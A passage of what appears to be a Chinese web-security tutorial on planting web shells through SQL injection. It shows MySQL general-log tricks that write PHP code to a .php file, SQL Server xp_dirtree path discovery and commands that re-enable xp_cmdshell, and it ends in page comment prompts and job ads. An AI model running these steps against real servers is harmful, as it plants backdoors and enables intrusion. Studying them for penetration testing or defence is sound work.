三大數(shù)據庫如何寫入WebShell?
將log日志開啟,并設置日志的寫入位置:
Set globalgeneral_log = on;
Set globalgeneral_log_file = ‘F:/test.php’;
圖7:設置日志寫入位置
(2)使用寫入日志再讀取的方法
直接在SQL注入點,使用查詢語句,添加WebShell代碼,如下:
Select '<?phpphpinfo();?>';
此時這段WebShell代碼已經被記錄到日志文件中了,接下就可以使用連接工具進行連接了。
圖8:使用寫入日志再讀取的方法
SqlServer寫入WebShell
01必備條件
① 有相應的權限db_owner
② 獲得Web目錄的絕對路徑
02寫入方法
向MSSQL寫入WebShell的方法一共有種:利用xp_cmdshell命令、差異備份寫入shell、log備份寫入shell。
03使用XP_cmdshell寫入Webshell
(1)實驗前準備:
首先我們需要查找網站目錄的絕對路徑,查找絕對路徑的方法有5種:
通過報錯信息查找;
通過目錄爆破猜解;
通過旁站的目錄確定;
通過存儲過程來搜索;
通過讀取配置文件查找。
其中通過存儲過程來搜索,SQLServer提供了兩種方法:xp_cmdshell和xp_dirtree
execute master..xp_dirtree ‘c:’; 可以查出所有c:下的文件、目錄、子目錄。
圖9:查找網站目錄的絕對路徑
在真實環(huán)境中時,我們執(zhí)行execute可能并不能得到回顯信息,但我們可以在注入點處新建一張表,然后將xp_dirtree查詢到的信息插入其中,再查詢這張表即可得相應的絕對路徑了。
Xp_cmdshell是一個更為有效的查詢絕對路徑的函數(shù),但是目前已經被SQLServer默認關閉了,但我們可以使用如下命令啟用這個選項。
EXEC sp_configure 'show advanced options',1;//允許修改高級參數(shù)RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打開xp_cmdshell擴展RECONFIGURE;--
圖10:打開xp_cmdshell擴展
請輸入評論內容...
請輸入評論/評論長度6~500個字
圖片新聞
最新活動更多
- 高級軟件工程師 廣東省/深圳市
- 自動化高級工程師 廣東省/深圳市
- 光器件研發(fā)工程師 福建省/福州市
- 銷售總監(jiān)(光器件) 北京市/海淀區(qū)
- 激光器高級銷售經理 上海市/虹口區(qū)
- 光器件物理工程師 北京市/海淀區(qū)
- 激光研發(fā)工程師 北京市/昌平區(qū)
- 技術專家 廣東省/江門市
- 封裝工程師 北京市/海淀區(qū)
- 結構工程師 廣東省/深圳市